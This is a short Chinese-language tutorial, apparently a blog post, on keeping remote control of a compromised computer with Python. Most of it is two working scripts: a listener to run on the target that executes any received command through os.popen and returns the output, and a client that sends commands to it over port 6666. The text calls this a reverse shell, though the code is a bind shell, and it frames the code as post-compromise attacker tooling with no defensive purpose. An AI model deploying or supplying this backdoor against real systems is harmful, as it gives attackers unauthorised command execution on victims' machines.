有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
- from socket import *
- from os import *
- s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
- s.bind(('',6666))#补丁端口
- s.listen(1)#开始监听一个队列
- while True:
- sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号
- print ('客户端:',addr)
- while True:
- cmd=sock.recv(1024)#缓存长度 接收传递过来
- cmdstr=cmd.decode()
- if cmdstr=='exit':
- print ('客户端:',addr,'关闭')
- sock.close()
- break
- result=popen(cmdstr).read()
- sock.send(result.encode())
- s.close()
本机运行
- from socket import *
- from os import *
- c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
- c.connect(('127.0.0.1',6666))#连接地址
- while True:
- cmd=input("cmd:")
- c.send(cmd.encode())#必须传递流
- if cmd=='exit':
- c.close()
- break
- data=c.recv(1014)
- print (data.decode())